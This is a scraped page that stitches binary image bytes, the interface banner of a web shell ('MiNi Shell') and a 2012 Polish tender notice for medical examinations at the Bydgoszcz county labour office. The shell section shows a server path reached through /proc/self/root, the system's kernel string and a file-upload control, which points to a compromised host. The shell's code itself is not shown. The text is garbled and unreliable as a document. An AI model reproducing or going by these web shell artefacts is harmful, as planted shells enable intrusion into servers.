JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120410/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120410/111770-N-2012.html

<p class="kh_header"><b>Bydgoszcz: ŚWIADCZENIE USŁUG MEDYCZNYCH
DLA POWIATOWEGO URZĘDU PRACY W BYDGOSZCZY</b><br>
<b>Numer ogłoszenia: 111770 - 2012; data zamieszczenia: 10.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Bydgoszczy , ul. Toruńska 147, 85-950 Bydgoszcz, woj. kujawsko-pomorskie, tel. 052 36-04-300, faks 052 36-04-341.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.pup.bydgoszcz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ŚWIADCZENIE USŁUG MEDYCZNYCH
DLA POWIATOWEGO URZĘDU PRACY W BYDGOSZCZY.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie składa się z 2 części:
Część 1 - Przeprowadzanie badań lekarskich dla pracowników Powiatowego Urzędu Pracy w Bydgoszczy.
Część 2 - Przeprowadzanie badań lekarskich dla osób aktywizowanych przez Powiatowy Urząd Pracy w Bydgoszczy.

ZAKRES MERYTORYCZNY ORGANIZACJI ŚWIADCZENIA USŁUG MEDYCZNYCH DOTYCZĄCY KAŻDEJ CZĘŚCI ZAMÓWIENIA :
1.	MIEJSCE REALIZACJI ZAMÓWIENIA
1)	Miejscem realizacji zamówienia (udzielania świadczeń medycznych) musi być miasto Bydgoszcz. Zamawiający wymaga, aby medyczne laboratorium diagnostyczne, co najmniej dwa gabinety lekarskie medycyny pracy oraz co najmniej trzy inne gabinety specjalistyczne znajdowały się w jednym miejscu na terenie miasta Bydgoszczy z możliwością dojazdu miejską komunikacją publiczną w to miejsce.
2)	Wykonawca zobowiązany jest w formularzu oferty - załącznik nr 2 do SIWZ wskazać dokładny adres miejsca realizacji zamówienia.
3)	Zamawiający może zażądać świadczenia usługi medycznej w siedzibie głównej Zamawiającego - Bydgoszcz, ul. Toruńska 147 oraz w razie wystąpienia takiej konieczności - w lokalizacjach zewnętrznych Zamawiającego: Filia w Koronowie, Filia w Solcu Kujawskim, Punkt Wspierania Samozatrudnienia i Samorządowy Klub Pracy ul. Mennica 6 oraz Klub Integracji Społecznej WIATRAK ul. Kleeberga 2 w zakresie udziału w pracach zespołu ds. ryzyka zawodowego oraz w komisji BHP zamawiającego w zakresie przeglądu stanowisk pracy w celu dokonania oceny warunków pracy.

2.	CZAS REALIZACJI ZAMÓWIENIA
1)	Bieżąca realizacja usług medycznych będzie wykonywana w dni robocze tj. od poniedziałku do piątku, od godz. 7.00  do godz. 15.00 oraz w święta, niebędące dniami ustawowo wolnymi od pracy. Każdy lekarz specjalista musi przyjmować osoby na badania co najmniej 2 razy w tygodniu. Wykonawca zobowiązany jest w dniu zawarcia umowy w sprawie zamówienia publicznego przedłożyć zamawiającemu stały harmonogram (dni i godziny) przyjmowania lekarzy specjalistów. W przypadku zmiany harmonogramu wykonawca zobowiązany jest poinformować zamawiającego o tym fakcie najpóźniej w dniu zaistnienia zmiany.
2)	Maksymalny okres wykonania badań od dnia zgłoszenia się osoby ze skierowaniem do Wykonawcy do dnia otrzymania zaświadczenia nie może być dłuższy niż 2 dni robocze, chyba że przepisy stanowią inaczej. W przypadku, gdy będzie wymagane wykonanie badań do celów sanitarno - epidemiologicznych okres ten nie może być dłuższy niż 10 dni roboczych, chyba że przepisy stanowią inaczej. 
3)	Wykonawca musi rozpocząć procedurę przeprowadzania badań lekarskich w tym samym dniu, w którym zgłosiła się do niego osoba skierowana na badania. Wykonawca nie może odesłać osoby i nie rozpocząć procedury (nie przeprowadzić badań).


3.	SKIEROWANIE I ORZECZENIE LEKARSKIE
1)	Wykonawca przeprowadzi badania na podstawie skierowania wydawanego przez zamawiającego. Osoby będą kierowane na badania sukcesywnie w zależności od potrzeb zamawiającego. Maksymalna ilość osób skierowanych przez zamawiającego dziennie na badania wynosi 60 osób.
2)	Rejestracja osób oraz organizacja udzielania świadczeń odbywać się będzie na zasadach ogólnych przewidzianych dla pacjentów przez wykonawcę.
3)	Badania lekarskie kończą się wydaniem orzeczenia lekarskiego w formie zaświadczenia. Orzeczenie lekarskie otrzymuje bezpośrednio osoba badana.
4)	Wykonawcy należy się wynagrodzenie za faktycznie przeprowadzone badania.
5)	W przypadku, gdy osoba skierowana na badania przedstawi dokumenty świadczące o ważnych badaniach lekarskich Wykonawca zobowiązany jest uwzględnić to(e) badanie(a), nie obciążając Zamawiającego kosztami. 
6)	Zamawiający będzie kierował osoby na badania określone w szczegółowej kalkulacji kosztów badań - załącznik nr 7b do SIWZ. Jeżeli zaistnieje konieczność przeprowadzenia badań niewymiennych w załączniku nr 7b do SIWZ zamawiający zapłaci za przeprowadzenie tych badań jak za badania wymagające konsultacji lekarza specjalisty (punkt II. 2 tabeli).
7)	Wykonawca jest zobowiązany adekwatnie do wskazanej na skierowaniu grupy zawodowej, szkolenia dobrać rodzaj badań jakie trzeba przeprowadzić zgodnych z obowiązującymi w stosunku do danego zawodu, szkolenia przepisami, chyba że lekarz stwierdzi celowość przeprowadzenia badań dodatkowych na podstawie wywiadu z osobą skierowaną na badania.


4.	PERSONEL
1)	Wykonawca zobowiązuje się udzielać usług medycznych zgodnie z obowiązującymi przepisami z należytą starannością i ze wskazaniami aktualnej wiedzy medycznej, dostępnymi mu metodami i środkami rozpoznania chorób oraz zasadami etyki zawodowej, respektując prawa pacjenta zgodnie z ustawą z dnia 6 listopada 2008 r. o prawach pacjenta i Rzeczniku Praw Pacjenta (Dz. U. z 2009 r. Nr 52, poz. 417, z późn. zm.).
2)	W razie trwałej lub czasowej nieobecności lekarza wykonującego badania lub innej osoby wykonującej zawód medyczny, wynikającej z przyczyn losowych lub niezależnych od wykonawcy, wykonawca jest zobowiązany zapewnić zastępstwo osoby (z wymaganymi przepisami prawa uprawnieniami) w celu zapewnienia ciągłości realizacji przedmiotu zamówienia. 
3)	Wykonawca jest zobowiązany zapewnić ilość personelu gwarantującą sprawną obsługę osób kierowanych na badania i płynne (bez opóźnień) świadczenie usług medycznych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Przedmiotem zamówień uzupełniających jest ŚWIADCZENIE USŁUG MEDYCZNYCH
DLA POWIATOWEGO URZĘDU PRACY W BYDGOSZCZY

Zamawiający przewiduje możliwość udzielania zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych w wysokości nie więcej niż 30 % wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> zamawiający nie przewiduje</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych spełniają warunki udziału w postępowaniu dotyczące posiadania uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania poprzez posiadanie  wpisu do rejestru podmiotów wykonujących działalność leczniczą zgodnie z ustawą z dnia 15 kwietnia 2011r. o działalności leczniczej (Dz. U. Nr 112, poz. 654 z późn. zm.).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie pomieszczeniami, w których będą udzielane świadczenia medyczne, umożliwiającymi realizację poszczególnej części zamówienia tzn:
-	wyposażonymi w produkty lecznicze, wyroby medyczne, aparaturę i sprzęt medyczny,
-	bez barier architektonicznych umożliwiających osobom niepełnosprawnym udział w badaniach, 
-	 posiadającymi opinię właściwego organu Państwowej Inspekcji Sanitarnej o spełnieniu warunków wymaganych przy udzielaniu określonych świadczeń zdrowotnych,
-	zgodnych z właściwymi przepisami, w szczególności zgodnych z:
~	ustawą z dnia 27.06.1997 r. o służbie medycyny pracy (Dz.U. z 2004 r. Nr 125, poz. 1317 z późn. zm.),
~	ustawą z dnia 15 kwietnia 2011 o działalności leczniczej (Dz. U. Nr 112, poz. 654 z późn. zm.),
~	rozporządzeniem Ministra Zdrowia z dnia 21 sierpnia 2006 r. w sprawie szczegółowych warunków bezpiecznej pracy z urządzeniami radiologicznymi (Dz.U. Nr 180, poz. 1325).

-	Zamawiający wymaga, aby wykonawca dysponował:
~	co najmniej siedmioma gabinetami specjalistycznymi (dwoma gabinetami lekarskimi medycyny pracy, jednym gabinetem okulistycznym, jednym gabinetem laryngologicznym, jednym gabinetem neurologicznym, jednym gabinetem psychologicznym umożliwiającym wykonanie badań psychotechnicznych oraz jednym gabinetem kardiologicznym),
~	 medycznym laboratorium diagnostycznym, zgodnym z rozporządzeniem Ministra Zdrowia z dnia 3 marca 2004 r. w sprawie wymagań, jakim powinno odpowiadać medyczne laboratorium diagnostyczne (Dz. U. Nr 43, poz. 408, z późn. zm.) oraz umożliwiającym wykonanie badania materiału biologicznego na zasadach określonych w ustawie z dnia 27 lipca 2001r. o diagnostyce laboratoryjnej (Dz. U. z 2004r. Nr 144 poz. 1529 z późn. zm.) oraz
~	pomieszczeniami umożliwiającymi przeprowadzenie badań sanitarno-epidemiologicznych.

-	Zamawiający wymaga, aby medyczne laboratorium diagnostyczne, co najmniej dwa gabinety lekarskie medycyny pracy oraz co najmniej trzy inne gabinety specjalistyczne znajdowały się w jednym miejscu na terenie miasta Bydgoszczy z możliwością dojazdu miejską komunikacją publiczną w to miejsce.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>b)	posiadanie osób zdolnych do wykonania zamówienia z wykształceniem, kwalifikacjami, doświadczeniem i uprawnieniami (jeżeli przepisy prawa nakładają obowiązek ich posiadania) niezbędnymi do realizacji poszczególnej części zamówienia poprzez dysponowanie osobami spełniającymi wymagania określone w odrębnych przepisach, w szczególności w:
-	ustawie z dnia 27 czerwca 1997 r. o służbie medycyny pracy (Dz.U. z 2004 r. Nr 125, poz. 1317 z późn. zm.),
-	ustawie z dnia 15 kwietnia 2011 r. o działalności leczniczej (Dz.U. Nr 112, poz. 654 z późn. zm.),
-	rozporządzeniu Ministra Zdrowia i Opieki Społecznej z dnia 30 maja 1996r. w sprawie przeprowadzania badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie Pracy (Dz. U. z 1996r. Nr 69 poz. 332 z późn. zm.),
-	a także w innych aktualnie obowiązujących w tym zakresie przepisach prawa.





Zamawiający wymaga, aby wykonawca dysponował co najmniej:
-	dwoma lekarzami medycyny ze specjalizacją w dziedzinie medycyny pracy,
-	jednym lekarzem medycyny ze specjalizacją w dziedzinie okulistyki,
-	jednym lekarzem medycyny ze specjalizacją w dziedzinie neurologii, 
-	jednym lekarzem medycyny ze specjalizacją w dziedzinie laryngologii, 
-	jednym lekarzem medycyny ze specjalizacją w dziedzinie kardiologii, 
-	jedną osobą ze specjalizacją w dziedzinie psychologii,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajdowanie się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia poprzez posiadanie obowiązkowego ubezpieczenia odpowiedzialności cywilnej podmiotu wykonującego działalność leczniczą, zgodnie z rozporządzeniem Ministra Finansów z dnia 22 grudnia 2011 r. w sprawie obowiązkowego ubezpieczenia odpowiedzialności cywilnej podmiotu wykonującego działalność leczniczą (Dz.U. Nr 293, poz. 1729 z późn. zm.).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">6.6.	Zamawiający na potwierdzenie, że oferowane usługi medyczne odpowiadają jego wymaganiom wymaga złożenia przez wykonawcę szczegółowej kalkulacji kosztów badań lekarskich - załącznik nr 7a (dotyczy części nr 1 zamówienia) i 7b (dotyczy części nr 2 zamówienia) do SIWZ.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Pełnomocnictwo wystawione zgodnie z wymogami ustawowymi, w tym w formie pisemnej z uiszczoną opłatą skarbową i podpisane przez prawnie upoważnionych przedstawicieli każdego z wykonawców.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmiany postanowień umowy, o której mowa w Rozdziale XVII Punkt 17.1. SIWZ,  na pisemny wniosek wykonawcy złożony najpóźniej w dniu zaistnienia okoliczności uzasadniających zmianę, za zgodą wyrażoną przez zamawiającego na piśmie w zakresie:
1)	zmiany terminu realizacji zamówienia,
2)	zmiany dokumentacji z realizacji zamówienia, gdy konieczność ich dokonania wynika ze zdarzeń, których nie można było przewidzieć w dniu zawarcia umowy.
3)	zmiany miejsca wykonywania zamówienia, gdy konieczność jej dokonania wynika ze zdarzeń, których nie można było przewidzieć w dniu zawarcia umowy. Zmiana ta nie może prowadzić do obniżenia wymagań technicznych i funkcjonalnych określonych w Rozdziale V Punkt 5.1. podpunkt 3a SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.pup.bydgoszcz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> http://bip.pup.bydgoszcz.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.04.2012 godzina 09:30, miejsce: Sekretariat PUP Bydgoszcz
ul. Toruńska 147 budynek główny IIp. pokój 207.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PRZEPROWADZANIE BADAŃ LEKARSKICH DLA PRACOWNIKÓW POWIATOWEGO URZĘDU PRACY W BYDGOSZCZY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonywanie usług medycznych polegających na przeprowadzaniu badań lekarskich dla pracowników (osób zatrudnionych i przyjmowanych do pracy) Powiatowego Urzędu Pracy w Bydgoszczy.
2.	Wykonawca zobowiązany jest przeprowadzać badania lekarskie w szczególności zgodnie z:
1)	ustawą  z dnia 27 czerwca 1997 r. o służbie medycyny pracy (Dz. U. z 2004 r. Nr 125 poz. 1317 z późn. zm.), 
2)	ustawą z dnia 15 kwietnia 2011 r. o działalności leczniczej (Dz. U. z 2011 r. Nr 112 poz. 654 z poźn. zm.),
3)	rozporządzeniem Ministra Zdrowia i Opieki Społecznej z dnia 30 maja 1996 r. w sprawie przeprowadzania badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie Pracy (Dz. U z 1996 r. Nr 69 poz. 1586), 
4)	rozporządzeniem Ministra Spraw Wewnętrznych z dnia 05.01.2012 r. w sprawie zadań służby medycyny pracy (Dz.U. z 2012 r. poz.  52),
5)	rozporządzeniem Ministra Spraw Wewnętrznych z dnia 05.01.2012 r. w sprawie służby medycyny pracy (Dz.U. z 2012 r. poz. 53),
6)	ustawą z dnia 27 sierpnia 1997 r. o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych (Dz. U. z 2011 r. nr 127 poz. 721 z późn. zm.),
7)	a także innymi aktualnie obowiązującymi w tym zakresie przepisami prawa.

3.	W zakresie profilaktycznych badań lekarskich Zamawiający zastrzega, że:
1)	zakres badań lekarskich musi obejmować badania profilaktyczne wymagane art. 229 ustawy z dnia 26.06.1974 r. - Kodeks pracy (Dz.U. z 1998 r. Nr 21, poz. 94 z późn. zm.) tj. badania wstępne, okresowe, kontrolne, specjalistyczne badania konsultacyjne, badania dodatkowe.
2)	badania lekarskie muszą być przeprowadzane zgodnie z rozporządzeniem Ministra Zdrowia i Opieki Społecznej z dnia 30 maja 1996r. w sprawie przeprowadzania badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie Pracy (Dz. U. z 1996r. Nr 69 poz. 332 z późn. zm.).
3)	profilaktyczne badania lekarskie muszą być zakończone wydaniem orzeczenia lekarskiego w formie zaświadczenia zgodnie z wzorami określonymi w rozporządzeniu Ministra Zdrowia i Opieki Społecznej z dnia 30 maja 1996r. w sprawie przeprowadzania badań lekarskich pracowników (...)

